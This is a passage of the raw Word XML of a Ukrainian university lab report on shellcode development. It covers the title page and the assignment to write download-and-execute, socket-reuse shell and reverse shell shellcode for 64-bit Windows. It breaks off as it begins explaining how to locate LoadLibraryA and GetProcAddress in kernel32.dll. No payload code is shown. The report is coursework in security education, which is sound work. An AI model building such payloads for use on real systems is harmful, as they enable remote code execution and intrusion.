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E273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Міністерство освіти і науки України</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5894183D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Національний технічний університет України</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4472BA6C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"Київський політехнічний інститут імені Ігоря Сікорського"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0066880C" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="00F75303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Фізико-технічний інститут</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DDA6B" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="00F75303" w:rsidRDefault="00A87058" w:rsidP="00E87B42">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F314591" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="00F75303" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704695ED" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="00F75303" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF2A586" w14:textId="77777777" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC4EC69" w14:textId="77777777" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AE2CBF" w14:textId="77777777" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C426DF4" w14:textId="77777777" w:rsidR="009E45F4" w:rsidRDefault="00C50939" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50939">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>АНАЛIЗ БIНАРНИХ ВРАЗЛИВОСТЕЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E00C0" w14:textId="6E9DAD82" w:rsidR="00A87058" w:rsidRDefault="00EA496E" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA496E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Лабораторна робота</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9AE67" w14:textId="77777777" w:rsidR="00EA496E" w:rsidRDefault="00EA496E" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DF9A0B" w14:textId="0FF9CC6D" w:rsidR="00A87058" w:rsidRPr="004E74F1" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Робота </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>№</w:t>
      </w:r>
      <w:r w:rsidR="00FE7CA8" w:rsidRPr="004E74F1">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B257F19" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4889B986" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669F228B" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FD18AC" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A840B8" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C7C291" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447FF87C" w14:textId="77777777" w:rsidR="00A87058" w:rsidRPr="002A3703" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6C95A5" w14:textId="04C2FFB1" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260F3A03" w14:textId="77777777" w:rsidR="00CA2B26" w:rsidRPr="002A3703" w:rsidRDefault="00CA2B26" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB5E1A9" w14:textId="5DE84069" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:ind w:left="5760"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Викон</w:t>
      </w:r>
      <w:r w:rsidR="006B1098">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ав</w:t>
      </w:r>
      <w:r w:rsidR="002C5D7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C5D7A">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>студент гр.</w:t>
      </w:r>
      <w:r w:rsidR="002C5D7A">
        <w:t xml:space="preserve"> ФБ-</w:t>
      </w:r>
      <w:r w:rsidR="002C5D7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>31мп</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F0104" w14:textId="520D4A03" w:rsidR="00A87058" w:rsidRPr="00062558" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:ind w:left="5760"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00062558">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Шевченко С.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00062558">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ш.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0564E" w14:textId="24BD145D" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00CA2B26">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121BBE10" w14:textId="77777777" w:rsidR="00A87058" w:rsidRDefault="00A87058" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2694B2F1" w14:textId="77777777" w:rsidR="00570160" w:rsidRDefault="00570160" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0A49E9" w14:textId="77777777" w:rsidR="00570160" w:rsidRDefault="00570160" w:rsidP="00A87058">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70176EC4" w14:textId="6D13806C" w:rsidR="002D0677" w:rsidRDefault="00A87058" w:rsidP="00D60214">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Київ </w:t>
      </w:r>
      <w:r w:rsidR="0065530B">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00062558">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00A03589">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABCD99" w14:textId="2E7E6F9B" w:rsidR="00350A27" w:rsidRPr="00141F56" w:rsidRDefault="00350A27" w:rsidP="00D1157B">
      <w:r w:rsidRPr="00062558">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00141F56" w:rsidRPr="00141F56">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Шеллкоди</w:t>
      </w:r>
      <w:r w:rsidR="00141F56" w:rsidRPr="00141F56">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADC81FD" w14:textId="7F39A1E4" w:rsidR="00414B36" w:rsidRDefault="00350A27" w:rsidP="00D1157B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF633B">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Мета роботи:</w:t>
      </w:r>
      <w:r w:rsidRPr="00350A27">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00141F56" w:rsidRPr="00141F56">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отримати навички аналiзу та розробки шеллкодiв.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8CE49" w14:textId="7D155617" w:rsidR="009668CF" w:rsidRDefault="00D3386D" w:rsidP="00350A27">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097A52">
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Варіант:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0020485B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0023189C" w:rsidRPr="00A265DA">
        <w:t>, 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="0020485B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> у списку</w:t>
      </w:r>
      <w:r w:rsidR="00392C49">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00327FAA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>групи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438ABBE" w14:textId="77777777" w:rsidR="00D3386D" w:rsidRDefault="00D3386D" w:rsidP="00350A27">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425ED5F9" w14:textId="7B03A3CF" w:rsidR="00A118AC" w:rsidRDefault="005D6CFF" w:rsidP="004E74F1">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виконання завдань:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429846C2" w14:textId="4273AD6C" w:rsidR="004B3A7A" w:rsidRPr="004B3A7A" w:rsidRDefault="007E0667" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E0667">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r w:rsidRPr="00064931">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Розроб</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ть шеллкоди:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF5DE9" w14:textId="40FBA13C" w:rsidR="004B3A7A" w:rsidRPr="004B3A7A" w:rsidRDefault="004276E8" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004276E8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">– завантаження </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запуску на виконання файлу (</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25831E3A" w14:textId="75874601" w:rsidR="004B3A7A" w:rsidRPr="004B3A7A" w:rsidRDefault="004276E8" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004276E8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>– шелл з використанням вже в</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>дкритого з’єднання (</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="005F30CF" w:rsidRPr="005F30CF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reuse</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B759EE5" w14:textId="5B51A99D" w:rsidR="00CA40EB" w:rsidRPr="004276E8" w:rsidRDefault="004276E8" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004276E8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>– шелл з оберненим з’єднанням (</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="004B3A7A" w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="005F30CF" w:rsidRPr="004276E8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC038A" w14:textId="384A0A30" w:rsidR="004B3A7A" w:rsidRPr="005F30CF" w:rsidRDefault="004B3A7A" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001777E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>для платформи за вар</w:t>
      </w:r>
      <w:r w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="001777E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>антом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDB192" w14:textId="77777777" w:rsidR="004B3A7A" w:rsidRPr="001777E2" w:rsidRDefault="004B3A7A" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001777E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001777E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intel</w:t>
      </w:r>
      <w:r w:rsidRPr="001777E2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, 64-</w:t>
      </w:r>
      <w:r w:rsidRPr="004B3A7A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF4988" w14:textId="3773468A" w:rsidR="00302689" w:rsidRDefault="00302689" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78751CD6" w14:textId="77777777" w:rsidR="00643522" w:rsidRDefault="00643522" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BFE68C" w14:textId="126ECD21" w:rsidR="00DC647F" w:rsidRPr="00D11174" w:rsidRDefault="00DC647F" w:rsidP="00994710">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Підготовка</w:t>
      </w:r>
      <w:r w:rsidR="005A6C90">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4DD397" w14:textId="20F3142D" w:rsidR="00CC688F" w:rsidRPr="00CC688F" w:rsidRDefault="00CC688F" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Щоб написати шелкод, нам треба знайти адреси функцій </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB40ED">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1A5A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>GetProcAddress(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC688F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="000428DC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="000428DC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="000428DC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB40ED">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744AD1D" w14:textId="6FE6CB06" w:rsidR="00CC688F" w:rsidRDefault="002E6DA6" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB40ED">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00B3792A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>завантажу</w:t>
      </w:r>
      <w:r w:rsidR="00B3792A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>є</w:t>
      </w:r>
      <w:r w:rsidR="00610F5F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>бібліотеку в пам'ять процесу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9AD02" w14:textId="75143616" w:rsidR="002E6DA6" w:rsidRDefault="00C81B89" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1A5A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>GetProcAddress(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC688F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
